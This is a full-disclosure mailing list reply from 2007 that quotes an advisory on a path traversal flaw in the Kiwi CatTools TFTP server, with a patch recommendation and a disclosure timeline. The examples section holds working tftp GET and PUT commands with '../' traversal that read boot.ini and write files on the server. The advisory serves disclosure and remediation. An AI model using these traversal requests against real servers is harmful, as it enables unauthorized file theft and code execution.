[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal
From:       3APA3A <3APA3A () SECURITY ! NNOV ! RU>
Date:       2007-02-27 15:17:45
Message-ID: 1491349282.20070227181745 () SECURITY ! NNOV ! RU
[Download RAW message or body]


Probably, it's same or related issue for reported by nicob at nicob.net.
http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888

--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@securityfocus.com:

n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
n> server can lead to information disclosure and remote code execution

n> Risk: High

n> DISCUSSION


n> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET
n> request which can be used to download/upload any file from/to server.
n> Default setting allows replacing of existing files. Such settings lead to
n> probability to replace an executable files and run code on attacker choice.

n> EXAMPLES

C:\>>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt

n> Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>>type boot.txt

n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt

n> Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>>type pttest.txt

n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>>

 

n> SOLUTION

 

n> Upgrade to CatTools 3.2.9 which is available for download at
n> <http://www.kiwisyslog.com/downloads.php>
n> http://www.kiwisyslog.com/downloads.php

 

 

n> CREDITS

 

n> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)

n> DISCLOSURE TIMELINE

 

n> Vulnerability discovered:           11/20/2006

n> Initial vendor contact:                12/08/2006

n> Patch released:                         02/13/2007

n> Public disclosure:                      02/27/2007

 



-- 
~/ZARAZA http://securityvulns.com/
Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]